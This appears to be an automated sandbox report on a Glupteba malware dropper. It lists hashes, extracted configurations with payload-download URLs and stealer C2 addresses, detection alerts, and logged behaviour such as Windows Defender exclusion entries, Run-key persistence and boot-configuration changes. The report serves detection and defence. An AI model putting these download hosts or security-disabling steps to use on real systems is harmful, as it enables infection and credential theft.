glupteba | 9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea

Analysis

max time kernel
4294125s
max time network
161s
platform
windows7_x64
resource
win7-20220311-en
submitted
12-03-2022 04:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
Size

7.7MB
MD5

e7dc7cfc304712af07e027db36fa2a88
SHA1

b843ba8428bc08f5bbc20ef1f8b0d1c39ff5d420
SHA256

9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea
SHA512

36a81ac64dec7f75fed9e6e4ae92c0632b2e25524935a8ba64647ffa2f5d1bd655035df03092a568c9211dd8938a1ddad6585857b6646aeda1fdc03016743723

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

UDP

45.9.20.20:13441

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

raccoon

Botnet

5e952d9d2bbe82643afb1857a7befd7377f3a063

Attributes

url4cnc
http://185.3.95.153/sbjoahera
http://185.163.204.22/sbjoahera
https://t.me/sbjoahera

rc4.plain

Extracted

Family

tofsee

patmushta.info

ovicrush.cn

Extracted

Family

redline

Botnet

ISTALL1

86.107.197.196:63065

Attributes

auth_value
5fe37244c13b89671311b4f994adce81

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/620-141-0x0000000001370000-0x0000000001C8E000-memory.dmp	family_glupteba
behavioral1/memory/620-142-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral1/memory/976-149-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral1/memory/1596-156-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 12 IoCs

Processes:

resource	yara_rule
behavioral1/memory/816-113-0x0000000000510000-0x0000000000536000-memory.dmp	family_redline
behavioral1/memory/816-115-0x0000000002020000-0x0000000002044000-memory.dmp	family_redline
behavioral1/memory/1152-187-0x0000000001330000-0x0000000001575000-memory.dmp	family_redline
behavioral1/memory/1152-190-0x0000000001330000-0x0000000001575000-memory.dmp	family_redline
behavioral1/memory/2176-196-0x0000000000A30000-0x0000000000D75000-memory.dmp	family_redline
behavioral1/memory/2176-205-0x0000000000A30000-0x0000000000D75000-memory.dmp	family_redline
behavioral1/memory/1152-220-0x0000000001330000-0x0000000001575000-memory.dmp	family_redline
behavioral1/memory/2176-221-0x0000000000A30000-0x0000000000D75000-memory.dmp	family_redline
behavioral1/memory/2176-239-0x0000000000A30000-0x0000000000D75000-memory.dmp	family_redline
behavioral1/memory/2176-240-0x0000000000A30000-0x0000000000D75000-memory.dmp	family_redline
behavioral1/memory/2688-263-0x0000000000370000-0x0000000000390000-memory.dmp	family_redline
behavioral1/memory/1152-271-0x0000000001330000-0x0000000001575000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2016	bcdedit.exe
1620	bcdedit.exe
404	bcdedit.exe
464	bcdedit.exe
1872	bcdedit.exe
1640	bcdedit.exe
1756	bcdedit.exe
1872	bcdedit.exe
1640	bcdedit.exe
1860	bcdedit.exe
404	bcdedit.exe
1640	bcdedit.exe
1860	bcdedit.exe
464	bcdedit.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2100-216-0x0000000000220000-0x0000000000264000-memory.dmp	family_onlylogger
behavioral1/memory/2100-218-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/2084-192-0x0000000001DE0000-0x0000000001E8C000-memory.dmp	family_vidar
behavioral1/memory/2084-204-0x0000000000400000-0x0000000000534000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 29 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exeGraphics.execsrss.exepatch.exekEr7GFa8cE1DrzemeCx_fozi.exedsefix.exe7GIEcJAjHVnlLymwwBfwoMmL.exe8TxLhHUQ1oZ0Uu5hlebvJ2zF.exetVjWgRWFuENkMzHM989O3gyj.exeOau9f5hESt2piyFB0srDrfeN.exe49WLUN7reDqByNTOmOCHCazs.exeH4xHPtfnp34v0pHb0rXM2ukW.exeN95dd5TPDI19sIMZ7IKIHq1l.exefindstr.exewMU7e8jcER5PpPMVk_s6HIVn.exe3qRp7a13ycwuUiJD40qblMly.exeGXHLCfUnGIYVJbhSUgFpdckC.exe4hLOdwiWnZa_mNs2RwFGYhXv.exejYstIpRhHMPbJk_cInWr7lmb.exeTD1d_0Y92mcuUwAjrMxXkjHW.exej9WnWhEPseZ219WrP4tvCfpE.exe

pid	process
1980	SoCleanInst.exe
1808	md9_1sjm.exe
580	Folder.exe
620	Graphics.exe
816	Updbdate.exe
2032	Install.exe
1544	Files.exe
992	pub2.exe
1088	File.exe
976	Graphics.exe
1596	csrss.exe
1560	patch.exe
1652	kEr7GFa8cE1DrzemeCx_fozi.exe
1528	dsefix.exe
804	7GIEcJAjHVnlLymwwBfwoMmL.exe
1528	8TxLhHUQ1oZ0Uu5hlebvJ2zF.exe
1152	tVjWgRWFuENkMzHM989O3gyj.exe
2072	Oau9f5hESt2piyFB0srDrfeN.exe
2084	49WLUN7reDqByNTOmOCHCazs.exe
2092	H4xHPtfnp34v0pHb0rXM2ukW.exe
2108	N95dd5TPDI19sIMZ7IKIHq1l.exe
2100	findstr.exe
2152	wMU7e8jcER5PpPMVk_s6HIVn.exe
2120	3qRp7a13ycwuUiJD40qblMly.exe
2136	GXHLCfUnGIYVJbhSUgFpdckC.exe
2168	4hLOdwiWnZa_mNs2RwFGYhXv.exe
2160	jYstIpRhHMPbJk_cInWr7lmb.exe
2176	TD1d_0Y92mcuUwAjrMxXkjHW.exe
2240	j9WnWhEPseZ219WrP4tvCfpE.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

File.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation File.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 64 IoCs

Processes:

9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exeGraphics.exepatch.exeFile.execsrss.exe

pid	process
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
976	Graphics.exe
976	Graphics.exe
864
1560	patch.exe
1560	patch.exe
1560	patch.exe
1560	patch.exe
1560	patch.exe
1088	File.exe
1560	patch.exe
1560	patch.exe
1560	patch.exe
1596	csrss.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe
1088	File.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

Graphics.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyDarkness = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Graphics.exe = "0"	Graphics.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\HolyDarkness = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

198 ipinfo.io
54 ipinfo.io
55 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

tVjWgRWFuENkMzHM989O3gyj.exe

pid process

1152 tVjWgRWFuENkMzHM989O3gyj.exe

flow	ioc
198	ipinfo.io
54	ipinfo.io
55	ipinfo.io

pid	process
1152	tVjWgRWFuENkMzHM989O3gyj.exe

Drops file in Windows directory 3 IoCs

Processes:

Graphics.exemakecab.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20220312050504.cab	makecab.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2580 schtasks.exe
2780 schtasks.exe
972 schtasks.exe
2100 schtasks.exe
1208 schtasks.exe
1420 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2116 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2640 tasklist.exe
3060 tasklist.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2824 taskkill.exe
2344 taskkill.exe
2028 taskkill.exe

pid	process
2580	schtasks.exe
2780	schtasks.exe
972	schtasks.exe
2100	schtasks.exe
1208	schtasks.exe
1420	schtasks.exe

pid	process
2116	timeout.exe

pid	process
2640	tasklist.exe
3060	tasklist.exe

pid	process
2824	taskkill.exe
2344	taskkill.exe
2028	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Graphics.exe
